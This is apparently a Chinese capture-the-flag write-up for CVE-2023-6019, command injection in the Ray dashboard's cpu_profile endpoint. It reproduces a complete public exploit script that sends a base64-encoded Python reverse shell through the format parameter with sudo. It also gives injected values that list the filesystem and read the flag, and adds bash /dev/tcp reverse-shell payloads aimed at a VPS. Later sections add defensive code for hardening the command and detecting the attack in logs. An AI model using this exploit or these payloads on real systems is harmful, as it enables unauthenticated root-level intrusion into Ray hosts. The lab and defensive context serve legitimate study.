
春秋云镜-CVE-2023-6019

2024/10/25 11:27:12 Source: https://blog.csdn.net/m0_61155226/article/details/141687299 Keywords: 春秋云镜-CVE-2023-6019

Target description:

Ray's `cpu_profile` URL parameter has a command injection vulnerability that allows an unauthenticated remote attacker to execute operating system commands on the host running the Ray dashboard.

Public PoC reference: Ray OS v2.6.3 - Command Injection RCE (Unauthorized) - Python webapps Exploit

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is
#  not validated before being inserted into a system command executed in a shell, allowing
#  for arbitrary command execution. If the system is configured to allow passwordless sudo
#  (a setup some Ray configurations require) this will result in a root shell being returned
#  to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================
# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

proxies = {"http": "127.0.0.1:8080"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}

def check_url(target, port):
    target_url = target + ":" + port
    https = 0
    if 'http' not in target:
        try:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            test_url = 'http://' + target_url
            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
            if response.status_code != 200:
                is_https = 0
                return is_https
        except Exception as e:
            print("ERROR! The Exception is:" + format(e))
    if https == 1:
        return "https://" + target_url
    else:
        return "http://" + target_url

def exp(target, ip, lhost, lport):
    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
    print("[*]Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode())
    print("[*]Base64 encoding payload is: " + b64_payload.decode())
    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
    print(exp_url)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    response = requests.get(url=exp_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[-]ERROR: Exploit Failed,please check the payload.")
    else:
        print("[+]Exploit is finished,please check your machine!")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='''⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄''', formatter_class=argparse.RawDescriptionHelpFormatter,)
    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
    args = parser.parse_args()
    # target = args.target
    ip = args.target
    # port = args.port
    # lhost = args.lhost
    # lport = args.lport
    targeturl = check_url(args.target, args.port)
    print(targeturl)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)

Analysing the public PoC, the vulnerable spot in the dashboard is: Jobs -> CPU Flame Graph (Driver)

Clicking it opens the CPU profiling page.

At this point we can control the command the program executes by crafting the format parameter. The normal command is:

sudo -n $(which py-spy) record -o /tmp/ray/session_2024-08-29_03-59-48_537905_11/logs/flamegraph_11_cpu_profiling.svg -p 11 -d 5 -f flamegraph

My crafted value is:

format=;ls -all /;2>/dev/null;2

The command the program now executes becomes:

sudo -n $(which py-spy) record -o /tmp/ray/session_2024-08-29_03-59-48_537905_11/logs/;ls -all /;2>/dev/null;2_11_cpu_profiling.txt -p 11 -d 5 -f ;ls -all /;2>/dev/null;2
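The command line above shows the root cause: the `format` value is pasted into a shell string, so the `;` characters end the py-spy command and start new ones. The following Python, added here as an illustration (it is not Ray's code and not part of the original post), places that vulnerable string-building pattern beside a hardened version that allowlists `format` (the set of py-spy output formats is an assumption made for the example), restricts `pid` and `duration` to digits, and builds an argv list instead of a shell string. The log directory and the py-spy binary path are constructed placeholders.

```python
import re
from typing import List

# Output formats that py-spy's "record -f/--format" option accepts. Assumed allowlist
# for this example; it is not taken from the Ray dashboard's own code.
ALLOWED_FORMATS = frozenset({"flamegraph", "raw", "speedscope"})

# Constructed stand-in for the per-session log directory seen in the writeup.
LOG_DIR = "/tmp/ray/session_example/logs"

# The injected value from the writeup, used here only as input to the two builders.
INJECTED_FORMAT = ";ls -all /;2>/dev/null;2"


def build_command_vulnerable(pid: str, duration: str, fmt: str) -> str:
    """Vulnerable pattern (illustrative, not Ray's code): request parameters are pasted
    into one string that is later handed to a shell. `format` lands both in the output
    file name and in the -f argument, so the shell sees the ';' and runs extra commands.
    Every parameter, not only `format`, is an injection sink in this shape."""
    out = f"{LOG_DIR}/{fmt}_{pid}_cpu_profiling.txt"
    return f"sudo -n $(which py-spy) record -o {out} -p {pid} -d {duration} -f {fmt}"


def _validate_int(name: str, value: str) -> int:
    """Accept only a short run of digits; anything a shell could interpret is refused."""
    if not re.fullmatch(r"[0-9]{1,7}", value):
        raise ValueError(f"{name} must be a positive integer, got {value!r}")
    return int(value)


def build_command_hardened(pid: str, duration: str, fmt: str,
                           py_spy: str = "/usr/local/bin/py-spy") -> List[str]:
    """Hardened pattern: validate each parameter against a strict shape (allowlist for
    `format`, digits only for pid/duration), resolve the binary path in code instead of
    via $(which ...), and return an argv list meant for subprocess.run() without
    shell=True, so no shell ever tokenises the user-supplied values."""
    if fmt not in ALLOWED_FORMATS:
        raise ValueError(f"unsupported profile format {fmt!r}")
    pid_i = _validate_int("pid", pid)
    dur_i = _validate_int("duration", duration)
    out = f"{LOG_DIR}/{fmt}_{pid_i}_cpu_profiling.txt"
    return ["sudo", "-n", py_spy, "record", "-o", out,
            "-p", str(pid_i), "-d", str(dur_i), "-f", fmt]


def shell_segments(command: str) -> List[str]:
    """Rough approximation of how sh splits a command line at ';' (quoting rules are
    ignored), enough to show how many separate commands the vulnerable string becomes."""
    return [seg.strip() for seg in command.split(";") if seg.strip()]


def is_rejected(pid: str, duration: str, fmt: str) -> bool:
    """True when the hardened builder refuses the parameters."""
    try:
        build_command_hardened(pid, duration, fmt)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    vuln = build_command_vulnerable("11", "5", INJECTED_FORMAT)
    print("vulnerable string, as the shell would split it:")
    for seg in shell_segments(vuln):
        print("   ", seg)
    print("hardened argv for a legitimate request:",
          build_command_hardened("11", "5", "flamegraph"))
    print("hardened builder rejects the injected format:",
          is_rejected("11", "5", INJECTED_FORMAT))
```

The argv list alone is not enough: without the allowlist a value such as `;ls -all /;` would still become the output file name, so validation of every parameter and avoiding the shell go together.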

Next, craft a value that reads the flag:

format=;sudo cat /flag;2>/dev/null;2


flag{e0488eb2-f9d7-4856-937c-e18b2e14a7d3}

Addendum: you can also send a reverse shell to a VPS:

format=xxx;bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1';11
format=xxx;bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F[IP]%2F[PORT]%200%3E%261';11
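From the defender's side, every request in this writeup (and in the PoC above) hits `/worker/cpu_profile` with a `format` value that is not one of py-spy's output formats and contains shell separators. The script below, an added example that is not from the original post or from Ray, scans access-log lines for exactly that pattern. The log format, the sample lines and the allowlist of formats are assumptions made for the example; the sample lines are constructed, not captured from a real dashboard.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus, urlsplit

# Formats the profiler endpoint legitimately accepts (assumed allowlist for this example).
ALLOWED_FORMATS = {"flamegraph", "raw", "speedscope"}

# Characters that never belong in a profile format, pid or duration: shell separators,
# redirections, command substitution and quotes.
SHELL_META = re.compile(r"""[;|&`$<>()'"\\\n]""")

# Common-log-format request line: source, timestamp, method, target, status.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real Ray dashboard output). Lines 2 and 3 carry the kind of
# `format` values the writeup uses; line 1 is a normal profiling request.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Aug/2024:04:01:10 +0000] "GET /worker/cpu_profile?pid=11&ip=10.0.0.2&duration=5&native=0&format=flamegraph HTTP/1.1" 200 5123
10.0.0.9 - - [29/Aug/2024:04:02:33 +0000] "GET /worker/cpu_profile?pid=11&ip=10.0.0.2&duration=5&native=0&format=;ls%20-all%20/;2%3E/dev/null;2 HTTP/1.1" 500 0
10.0.0.9 - - [29/Aug/2024:04:03:41 +0000] "GET /worker/cpu_profile?pid=11&ip=10.0.0.2&duration=5&native=0&format=xxx%3Bid%3B11 HTTP/1.1" 500 0
10.0.0.5 - - [29/Aug/2024:04:04:02 +0000] "GET /api/jobs/ HTTP/1.1" 200 881
"""


def query_params(target: str) -> Dict[str, str]:
    """Split the query on '&' only and percent-decode each side. parse_qs() is avoided on
    purpose: older Python versions also split on ';', which would hide exactly the
    separator an injection relies on."""
    params: Dict[str, str] = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def analyse_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a cpu_profile request whose parameters look like shell input,
    None for any other line."""
    m = LINE_RE.match(line)
    if not m or not urlsplit(m.group("target")).path.endswith("/worker/cpu_profile"):
        return None
    params = query_params(m.group("target"))
    fmt = params.get("format", "")
    reasons = []
    if fmt not in ALLOWED_FORMATS:
        reasons.append(f"format not in allowlist: {fmt!r}")
    for name in ("format", "pid", "duration", "ip"):
        if SHELL_META.search(params.get(name, "")):
            reasons.append(f"shell metacharacters in {name}")
    if not reasons:
        return None
    return {"src": m.group("src"), "ts": m.group("ts"), "status": m.group("status"),
            "format": fmt, "reasons": "; ".join(reasons)}


def scan(log_text: str) -> List[Dict[str, str]]:
    """Run analyse_line over every line and keep only the findings."""
    return [f for f in (analyse_line(ln) for ln in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding before matching matters: the second payload form in the writeup is fully percent-encoded, so a rule that looks for a literal `;` in the raw request line would miss it. The status code is kept in the finding because a successful injection here typically leaves a non-200 response, as the PoC's own success check relies on.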
